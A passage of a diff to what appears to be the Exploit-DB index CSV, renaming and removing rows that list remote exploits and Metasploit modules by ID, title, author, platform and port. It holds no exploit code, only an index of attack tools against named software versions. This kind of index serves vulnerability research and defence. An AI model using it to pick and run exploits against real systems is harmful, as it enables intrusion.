Overflow",2009-05-19,rgod,windows,remote,0 8742,platforms/windows/remote/8742.txt,"KingSoft Web Shield 1.1.0.62 - Cross-Site Scripting / Code Execution",2009-05-19,inking,windows,remote,0 -8753,platforms/osx/remote/8753.txt,"Apple Mac OSX - Java applet Remote Deserialization Remote PoC (2)",2009-05-20,"Landon Fuller",osx,remote,0 +8753,platforms/osx/remote/8753.txt,"Apple Mac OSX - Java applet Remote Deserialization Remote (PoC) (2)",2009-05-20,"Landon Fuller",osx,remote,0 8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0 8757,platforms/windows/remote/8757.html,"BaoFeng - 'config.dll' ActiveX Remote Code Execution",2009-05-21,etirah,windows,remote,0 8758,platforms/windows/remote/8758.html,"ChinaGames - 'CGAgent.dll' ActiveX Remote Code Execution",2009-05-21,etirah,windows,remote,0 @@ -10151,14 +10145,13 @@ id,file,description,date,author,platform,type,port 9039,platforms/multiple/remote/9039.txt,"cPanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote,0 9065,platforms/windows/remote/9065.c,"Green Dam - Remote Change System Time Exploit",2009-07-01,"Anti GD",windows,remote,0 9066,platforms/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Config Disclosure",2009-07-01,Septemb0x,hardware,remote,0 -9093,platforms/windows/remote/9093.txt,"Microsoft Windows live messenger plus! fileserver 1.0 - Directory Traversal",2009-07-09,joepie91,windows,remote,0 +9093,platforms/windows/remote/9093.txt,"Microsoft Windows Live Messenger Plus! Fileserver 1.0 - Directory Traversal",2009-07-09,joepie91,windows,remote,0 9096,platforms/windows/remote/9096.txt,"Sun One WebServer 6.1 - JSP Source Viewing",2009-07-09,kingcope,windows,remote,0 9106,platforms/windows/remote/9106.txt,"citrix xencenterweb - Cross-Site Scripting / SQL Injection / Remote Code Execution",2009-07-10,"Secure Network",windows,remote,0 9108,platforms/windows/remote/9108.py,"Microsoft Internet Explorer 7 Video - ActiveX Remote Buffer Overflow",2009-07-10,"David Kennedy (ReL1K)",windows,remote,0 9117,platforms/hardware/remote/9117.txt,"HTC / Windows Mobile OBEX FTP Service - Directory Traversal",2009-07-10,"Alberto Tablado",hardware,remote,0 9128,platforms/windows/remote/9128.py,"Pirch IRC 98 Client - 'Response' Remote Buffer Overflow (SEH)",2009-07-12,His0k4,windows,remote,0 9137,platforms/windows/remote/9137.html,"Mozilla Firefox 3.5 - (Font tags) Remote Buffer Overflow",2009-07-13,Sberry,windows,remote,0 -9139,platforms/windows/remote/9139.pl,"JetAudio 7.5.3 COWON Media Center - '.wav' Crash",2009-07-14,prodigy,windows,remote,0 9143,platforms/linux/remote/9143.txt,"Virtualmin < 3.703 - Multiple Local+Remote Vulnerabilities",2009-07-14,"Filip Palian",linux,remote,0 9181,platforms/windows/remote/9181.py,"Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray (1)",2009-07-17,"David Kennedy (ReL1K)",windows,remote,0 9209,platforms/hardware/remote/9209.txt,"DD-WRT HTTPd Daemon/Service - Remote Command Execution",2009-07-20,gat3way,hardware,remote,0 @@ -10229,27 +10222,27 @@ id,file,description,date,author,platform,type,port 9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 < 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow",2009-10-30,"Dennis Yurichev",windows,remote,1521 9913,platforms/multiple/remote/9913.rb,"ClamAV Milter 0.92.2 - Blackhole-Mode (Sendmail) Code Execution (Metasploit)",2007-08-24,patrick,multiple,remote,25 9914,platforms/unix/remote/9914.rb,"SpamAssassin spamd 3.1.3 - Command Injection (Metasploit)",2006-06-06,patrick,unix,remote,783 -9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit) (1)",2002-02-01,"H D Moore",multiple,remote,3632 +9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit)",2002-02-01,"H D Moore",multiple,remote,3632 9917,platforms/solaris/remote/9917.rb,"Solaris in.TelnetD TTYPROMPT - Buffer Overflow (Metasploit)",2002-01-18,MC,solaris,remote,23 9918,platforms/solaris/remote/9918.rb,"Solaris 10 / 11 Telnet - Remote Authentication Bypass (Metasploit)",2007-02-12,MC,solaris,remote,23 9920,platforms/solaris/remote/9920.rb,"Solaris sadmind adm_build_path - Buffer Overflow (Metasploit)",2008-10-14,"Adriano Lima",solaris,remote,111 9921,platforms/solaris/remote/9921.rb,"Solaris 8.0 LPD - Command Execution (Metasploit)",2001-08-31,"H D Moore",solaris,remote,515 9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd - Heap Overflow (Metasploit)",2002-06-10,noir,solaris,remote,6112 9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)",2003-04-07,"H D Moore",osx,remote,139 -9925,platforms/osx/remote/9925.rb,"Apple QuickTime RTSP 10.4.0 < 10.5.0 (OSX) - Content-Type Overflow (Metasploit)",2009-10-28,anonymous,osx,remote,0 -9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit)",2009-10-28,anonymous,osx,remote,0 +9925,platforms/osx/remote/9925.rb,"Apple QuickTime RTSP 10.4.0 < 10.5.0 (OSX) - Content-Type Overflow (Metasploit)",2009-10-28,Metasploit,osx,remote,0 +9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit)",2009-10-28,Metasploit,osx,remote,0 9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server 5.3.2 (OSX) - USER Overflow (Metasploit)",2004-07-13,ddz,osx,remote,21 9929,platforms/osx/remote/9929.rb,"Apple Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit)",2006-03-01,"H D Moore",osx,remote,25 9930,platforms/osx/remote/9930.rb,"Knox Arkeia Backup Client 5.3.3 (OSX) - Type 77 Overflow (Metasploit)",2005-02-18,"H D Moore",osx,remote,0 9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 (OSX) - LoginEXT PathName Overflow (Metasploit)",2004-03-03,"H D Moore",osx,remote,548 9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)",2007-01-21,toto,novell,remote,0 -9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (1)",2009-07-10,kf,multiple,remote,0 +9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,multiple,remote,0 9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow (Metasploit)",2004-05-19,spoonm,multiple,remote,3690 9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - nttrans Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139 9937,platforms/multiple/remote/9937.rb,"RealServer 7-9 - Describe Buffer Overflow (Metasploit)",2002-12-20,"H D Moore",multiple,remote,0 9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 - Unserialize Overflow (Metasploit)",2007-03-01,sesser,php,remote,0 9940,platforms/linux/remote/9940.rb,"NTPd 4.0.99j-k readvar - Buffer Overflow (Metasploit)",2001-04-04,patrick,linux,remote,123 -9941,platforms/multiple/remote/9941.rb,"Veritas NetBackup - Remote Command Execution (Metasploit) (1)",2004-10-21,patrick,multiple,remote,0 +9941,platforms/multiple/remote/9941.rb,"Veritas NetBackup - Remote Command Execution (Metasploit)",2004-10-21,patrick,multiple,remote,0 9942,platforms/multiple/remote/9942.rb,"HP OpenView OmniBack II A.03.50 - Command Execution (Metasploit)",2001-02-28,"H D Moore",multiple,remote,5555 9943,platforms/multiple/remote/9943.rb,"Apple QuickTime for Java 7 - Memory Access (Metasploit)",2007-04-23,"H D Moore",multiple,remote,0 9944,platforms/multiple/remote/9944.rb,"Opera 9.50 / 9.61 historysearch - Command Execution (Metasploit)",2008-10-23,egypt,multiple,remote,0 @@ -10263,7 +10256,7 @@ id,file,description,date,author,platform,type,port 9952,platforms/linux/remote/9952.rb,"PoPToP < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit)",2003-04-09,spoonm,linux,remote,1723 9953,platforms/linux/remote/9953.rb,"MySQL 6.0 yaSSL 1.7.5 - Hello Message Buffer Overflow (Metasploit)",2008-01-04,MC,linux,remote,3306 9954,platforms/linux/remote/9954.rb,"Borland Interbase 2007 - 'PWD_db_aliased' Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 -9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 - PoC Buffer Overflow",2009-10-23,"Francis Provencher",windows,remote,0 +9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 - Buffer Overflow (PoC)",2009-10-23,"Francis Provencher",windows,remote,0 9966,platforms/windows/remote/9966.txt,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (1)",2009-11-02,"Nikolas Rangos",windows,remote,80 33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0 9992,platforms/windows/remote/9992.txt,"AOL 9.1 SuperBuddy - ActiveX Control Remote code Execution",2009-10-01,Trotzkista,windows,remote,0 @@ -10288,9 +10281,9 @@ id,file,description,date,author,platform,type,port 10029,platforms/linux/remote/10029.rb,"Berlios GPSD 1.91-1 < 2.7-2 - Format String",2005-05-25,"Yann Senotier",linux,remote,2947 10030,platforms/linux/remote/10030.rb,"DD-WRT HTTP v24-SP1 - Command Injection",2009-07-20,"H D Moore",linux,remote,80 10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 - 'Secure' Overflow Exploit (Metasploit)",2004-07-18,onetwo,linux,remote,7787 -10033,platforms/irix/remote/10033.rb,"Irix LPD tagprinter - Command Execution (Metasploit) (1)",2001-09-01,"H D Moore",irix,remote,515 +10033,platforms/irix/remote/10033.rb,"Irix LPD tagprinter - Command Execution (Metasploit)",2001-09-01,"H D Moore",irix,remote,515 10034,platforms/hp-ux/remote/10034.rb,"HP-UX LPD 10.20 / 11.00 / 11.11 - Command Execution (Metasploit)",2002-08-28,"H D Moore",hp-ux,remote,515 -10035,platforms/bsd/remote/10035.rb,"Xtacacsd 4.1.2 - report() Buffer Overflow (Metasploit) (1)",2008-01-08,MC,bsd,remote,49 +10035,platforms/bsd/remote/10035.rb,"Xtacacsd 4.1.2 - 'report()' Buffer Overflow (Metasploit)",2008-01-08,MC,bsd,remote,49 10036,platforms/solaris/remote/10036.rb,"System V Derived /bin/login - Extraneous Arguments Buffer Overflow (modem based) (Metasploit)",2001-12-12,I)ruid,solaris,remote,0 10037,platforms/cgi/remote/10037.rb,"Mercantec SoftCart 4.00b - CGI Overflow (Metasploit)",2004-08-19,skape,cgi,remote,0 10047,platforms/windows/remote/10047.txt,"Femitter HTTP Server 1.03 - Remote Source Disclosure",2009-10-12,Dr_IDE,windows,remote,80 @@ -10521,9 +10514,9 @@ id,file,description,date,author,platform,type,port 15048,platforms/windows/remote/15048.txt,"SmarterMail 7.1.3876 - Directory Traversal",2010-09-19,sqlhacker,windows,remote,0 15056,platforms/windows/remote/15056.py,"Java 6.19 CMM readMabCurveData - Stack Overflow",2010-09-20,Abysssec,windows,remote,0 15071,platforms/windows/remote/15071.txt,"Softek Barcode Reader Toolkit ActiveX 7.1.4.14 - 'SoftekATL.dll' Buffer Overflow (PoC)",2010-09-21,LiquidWorm,windows,remote,0 -15072,platforms/windows/remote/15072.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (1)",2010-09-21,Trancer,windows,remote,0 +15072,platforms/windows/remote/15072.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit)",2010-09-21,Trancer,windows,remote,0 15073,platforms/windows/remote/15073.rb,"Novell iPrint Client - ActiveX Control 'debug' Buffer Overflow (Metasploit)",2010-09-21,Trancer,windows,remote,0 -15168,platforms/windows/remote/15168.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (2)",2010-10-01,Trancer,windows,remote,0 +15168,platforms/windows/remote/15168.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit)",2010-10-01,Trancer,windows,remote,0 15186,platforms/ios/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal",2010-10-02,m0ebiusc0de,ios,remote,0 15213,platforms/asp/remote/15213.pl,"Microsoft ASP.NET - Padding Oracle (MS10-070)",2010-10-06,"Giorgio Fedon",asp,remote,0 15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution",2010-11-23,Rew,windows,remote,0 @@ -10602,7 +10595,7 @@ id,file,description,date,author,platform,type,port 16056,platforms/windows/remote/16056.txt,"Oracle - Document Capture Insecure READ Method",2011-01-26,"Alexey Sintsov",windows,remote,0 16075,platforms/windows/remote/16075.pl,"Caedo HTTPd Server 0.5.1 ALPHA - Arbitrary File Download",2011-01-29,"Zer0 Thunder",windows,remote,0 16078,platforms/windows/remote/16078.py,"SDP Downloader 2.3.0 - (http_response) Remote Buffer Overflow",2011-01-30,sup3r,windows,remote,0 -16100,platforms/hardware/remote/16100.txt,"Tandberg E & EX & C Series Endpoints - Default Credentials for Root Account",2011-02-02,"Cisco Security",hardware,remote,0 +16100,platforms/hardware/remote/16100.txt,"Tandberg E & EX & C Series Endpoints - Default Root Account Credentials",2011-02-02,"Cisco Security",hardware,remote,0 16101,platforms/windows/remote/16101.py,"FTPGetter 3.58.0.21 - (PASV) Buffer Overflow Exploit",2011-02-03,modpr0be,windows,remote,0 16103,platforms/multiple/remote/16103.txt,"Majordomo2 - Directory Traversal (SMTP/HTTP)",2011-02-03,"Michael Brooks",multiple,remote,0 16105,platforms/windows/remote/16105.txt,"quickshare file share 1.2.1 - Directory Traversal (1)",2011-02-03,modpr0be,windows,remote,0 @@ -10631,9 +10624,7 @@ id,file,description,date,author,platform,type,port 16278,platforms/ios/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,ios,remote,0 16285,platforms/linux/remote/16285.rb,"NTP daemon readvar - Buffer Overflow (Metasploit)",2010-08-25,Metasploit,linux,remote,0 16286,platforms/multiple/remote/16286.rb,"RealServer - Describe Buffer Overflow (Metasploit)",2010-08-07,Metasploit,multiple,remote,0 -16287,platforms/multiple/remote/16287.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (2)",2010-11-11,Metasploit,multiple,remote,0 16289,platforms/linux/remote/16289.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Metasploit)",2010-02-11,Metasploit,linux,remote,0 -16290,platforms/multiple/remote/16290.rb,"Veritas NetBackup - Remote Command Execution (Metasploit) (2)",2010-10-09,Metasploit,multiple,remote,0 16291,platforms/multiple/remote/16291.rb,"HP OpenView OmniBack II - Command Execution (Metasploit)",2010-09-20,Metasploit,multiple,remote,0 16292,platforms/multiple/remote/16292.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Loop) (Metasploit)",2010-11-24,Metasploit,multiple,remote,0 16293,platforms/multiple/remote/16293.rb,"Sun Java - Calendar Deserialization Exploit (Metasploit)",2010-09-20,Metasploit,multiple,remote,0 @@ -10662,7 +10653,7 @@ id,file,description,date,author,platform,type,port 16318,platforms/multiple/remote/16318.rb,"JBoss JMX - Console Deployer Upload and Execute (Metasploit)",2010-10-19,Metasploit,multiple,remote,0 16319,platforms/multiple/remote/16319.rb,"JBoss JMX - Console Beanshell Deployer WAR Upload and Deployment (Metasploit)",2011-01-10,Metasploit,multiple,remote,0 16320,platforms/unix/remote/16320.rb,"Samba - 'Username' map script' Command Execution (Metasploit)",2010-08-18,Metasploit,unix,remote,0 -16321,platforms/linux/remote/16321.rb,"Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (2)",2010-04-28,Metasploit,linux,remote,0 +16321,platforms/linux/remote/16321.rb,"Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1)",2010-04-28,Metasploit,linux,remote,0 16322,platforms/solaris/remote/16322.rb,"Solaris LPD - Command Execution (Metasploit)",2010-09-20,Metasploit,solaris,remote,0 16323,platforms/solaris_sparc/remote/16323.rb,"Solaris dtspcd - Heap Overflow (Metasploit)",2010-04-30,Metasploit,solaris_sparc,remote,0 16324,platforms/multiple/remote/16324.rb,"Solaris Sadmind - Command Execution (Metasploit)",2010-06-22,Metasploit,multiple,remote,0 @@ -10726,8 +10717,6 @@ id,file,description,date,author,platform,type,port 16383,platforms/windows/remote/16383.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0 16384,platforms/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0 16385,platforms/windows/remote/16385.rb,"DATAC RealWin SCADA Server - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16386,platforms/windows/remote/16386.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (2)",2010-07-03,Metasploit,windows,remote,0 -16387,platforms/hardware/remote/16387.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (2)",2010-07-03,Metasploit,hardware,remote,0 16388,platforms/hardware/remote/16388.rb,"Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,hardware,remote,0 16389,platforms/windows/remote/16389.rb,"Omni-NFS Server - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16390,platforms/windows/remote/16390.rb,"Energizer DUO Trojan Code - Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0 @@ -10757,7 +10746,7 @@ id,file,description,date,author,platform,type,port 16414,platforms/windows/remote/16414.rb,"CA BrightStor ARCserve License Service - GCR NETWORK Buffer Overflow (Metasploit)",2010-11-03,Metasploit,windows,remote,0 16415,platforms/windows/remote/16415.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow (Metasploit)",2011-03-10,Metasploit,windows,remote,0 16416,platforms/windows/remote/16416.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Multiple Commands Buffer Overflow (Metasploit)",2010-11-04,Metasploit,windows,remote,0 -16417,platforms/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (1)",2010-10-05,Metasploit,windows,remote,0 +16417,platforms/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 16418,platforms/windows/remote/16418.rb,"CA BrightStor ARCserve - Message Engine Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16419,platforms/windows/remote/16419.rb,"Mercury/32 < 4.01b - PH Server Module Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16420,platforms/windows/remote/16420.rb,"Firebird Relational Database - SVC_attach() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 @@ -10817,7 +10806,6 @@ id,file,description,date,author,platform,type,port 16474,platforms/windows/remote/16474.rb,"Eudora Qualcomm WorldMail 3.0 - IMAPD LIST Buffer Overflow (Metasploit)",2010-07-01,Metasploit,windows,remote,0 16475,platforms/windows/remote/16475.rb,"MailEnable IMAPD Professional (2.35) - Login Request Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16476,platforms/windows/remote/16476.rb,"Mercur MailServer 5.0 - IMAP SP3 SELECT Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16477,platforms/windows/remote/16477.rb,"MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit) (2)",2010-06-22,Metasploit,windows,remote,0 16478,platforms/windows/remote/16478.rb,"Novell NetMail 3.52d - IMAP Subscribe Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16479,platforms/windows/remote/16479.rb,"IPSwitch IMail IMAP4D - Delete Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16480,platforms/windows/remote/16480.rb,"MailEnable - IMAPD W3C Logging Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 @@ -10841,7 +10829,6 @@ id,file,description,date,author,platform,type,port 16498,platforms/windows/remote/16498.rb,"EnjoySAP SAP GUI - ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16499,platforms/windows/remote/16499.rb,"Microsoft Internet Explorer - Unsafe Scripting Misconfiguration (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16500,platforms/windows/remote/16500.rb,"Hyleos ChemView - ActiveX Control Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,windows,remote,0 -16501,platforms/windows/remote/16501.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (2)",2010-09-21,Metasploit,windows,remote,0 16502,platforms/windows/remote/16502.rb,"IBM Lotus Domino Web Access Upload Module - Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16505,platforms/windows/remote/16505.rb,"Facebook Photo Uploader 4 - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16506,platforms/windows/remote/16506.rb,"Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit)",2010-07-16,Metasploit,windows,remote,0 @@ -10928,7 +10915,6 @@ id,file,description,date,author,platform,type,port 16592,platforms/windows/remote/16592.rb,"SoftArtisans XFile FileManager - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16594,platforms/windows/remote/16594.rb,"Adobe Shockwave Player - rcsL Memory Corruption (Metasploit)",2010-10-22,Metasploit,windows,remote,0 16595,platforms/windows/remote/16595.rb,"Norton AntiSpam 2004 - SymSpamHelper ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16596,platforms/windows/remote/16596.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (1)",2010-10-04,Metasploit,windows,remote,0 16597,platforms/windows/remote/16597.rb,"Microsoft Internet Explorer - 'VML' Fill Method Code Execution (MS06-055) (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16598,platforms/windows/remote/16598.rb,"Persits XUpload - ActiveX MakeHttpRequest Directory Traversal (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16599,platforms/windows/remote/16599.rb,"Microsoft Internet Explorer - 'Aurora' Memory Corruption (MS10-002) (Metasploit)",2010-07-12,Metasploit,windows,remote,0 @@ -10954,7 +10940,6 @@ id,file,description,date,author,platform,type,port 16647,platforms/windows/remote/16647.rb,"EMC ApplicationXtender (KeyWorks) - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16649,platforms/windows/remote/16649.rb,"Microsoft Works 7 - 'WkImgSrv.dll' WKsPictureInterface() ActiveX Exploit (Metasploit)",2010-09-25,Metasploit,windows,remote,0 16685,platforms/windows/remote/16685.rb,"MOXA MediaDBPlayback - ActiveX Control Buffer Overflow (Metasploit)",2010-11-05,Metasploit,windows,remote,0 -16689,platforms/windows/remote/16689.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (2)",2010-04-30,Metasploit,windows,remote,23 16690,platforms/windows/remote/16690.rb,"QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,80 16691,platforms/windows/remote/16691.rb,"Blue Coat WinProxy - Host Header Overflow (Metasploit)",2010-07-12,Metasploit,windows,remote,80 16692,platforms/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 - GET Request Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,3128 @@ -10997,7 +10982,7 @@ id,file,description,date,author,platform,type,port 16729,platforms/windows/remote/16729.rb,"SlimFTPd - LIST Concatenation Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP Server - 'Username' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)",2010-04-30,Metasploit,win_x86,remote,0 -16732,platforms/windows/remote/16732.rb,"httpdx - tolog() Function Format String (Metasploit) (1)",2010-08-25,Metasploit,windows,remote,0 +16732,platforms/windows/remote/16732.rb,"httpdx - 'tolog()' Function Format String (Metasploit) (1)",2010-08-25,Metasploit,windows,remote,0 16733,platforms/windows/remote/16733.rb,"FileCOPA FTP Server (Pre 18 Jul Version) - Exploit (Metasploit)",2010-04-30,Metasploit,windows,remote,21 16734,platforms/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow (Metasploit)",2010-08-03,Metasploit,windows,remote,0 16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 @@ -11049,7 +11034,7 @@ id,file,description,date,author,platform,type,port 16781,platforms/windows/remote/16781.rb,"MailEnable - Authorisation Header Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,0 16782,platforms/win_x86/remote/16782.rb,"Apache (Windows x86) - Chunked Encoding (Metasploit)",2010-07-07,Metasploit,win_x86,remote,0 16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Overflow Exploit (Metasploit)",2010-09-20,Metasploit,win_x86,remote,0 -16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (1)",2010-11-22,Metasploit,multiple,remote,80 +16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit)",2010-11-22,Metasploit,multiple,remote,80 16785,platforms/windows/remote/16785.rb,"Hewlett-Packard (HP) Power Manager Administration - Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,80 16786,platforms/win_x86/remote/16786.rb,"PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote,7144 16787,platforms/windows/remote/16787.rb,"IPSwitch WhatsUp Gold 8.03 - Buffer Overflow (Metasploit)",2010-07-14,Metasploit,windows,remote,0 @@ -11057,7 +11042,7 @@ id,file,description,date,author,platform,type,port 16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM - GET Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,9999 16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager - OvWebHelp.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16793,platforms/windows/remote/16793.rb,"Amlibweb NetOpacs - 'webquery.dll' Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,80 -16794,platforms/windows/remote/16794.rb,"httpdx - tolog() Function Format String (Metasploit) (2)",2010-08-25,Metasploit,windows,remote,80 +16794,platforms/windows/remote/16794.rb,"httpdx - 'tolog()' Function Format String (Metasploit) (2)",2010-08-25,Metasploit,windows,remote,80 16795,platforms/cgi/remote/16795.rb,"HP OpenView Network Node Manager - Toolbar.exe CGI Buffer Overflow (Metasploit)",2010-05-09,Metasploit,cgi,remote,0 16796,platforms/windows/remote/16796.rb,"BEA Weblogic - Transfer-Encoding Buffer Overflow (Metasploit)",2010-07-08,Metasploit,windows,remote,80 16797,platforms/windows/remote/16797.rb,"HP OpenView Network Node Manager (OV NNM) - ovalarm.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 @@ -11137,9 +11122,7 @@ id,file,description,date,author,platform,type,port 16874,platforms/osx/remote/16874.rb,"Apple Mac OSX EvoCam Web Server - HTTP GET Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0 16875,platforms/osx/remote/16875.rb,"Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,osx,remote,0 16876,platforms/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote,0 -16877,platforms/irix/remote/16877.rb,"Irix LPD tagprinter - Command Execution (Metasploit) (2)",2010-10-06,Metasploit,irix,remote,0 16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0 -16879,platforms/freebsd/remote/16879.rb,"Xtacacsd 4.1.2 - report() Buffer Overflow (Metasploit) (2)",2010-05-09,Metasploit,freebsd,remote,0 16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0 16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0 16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) 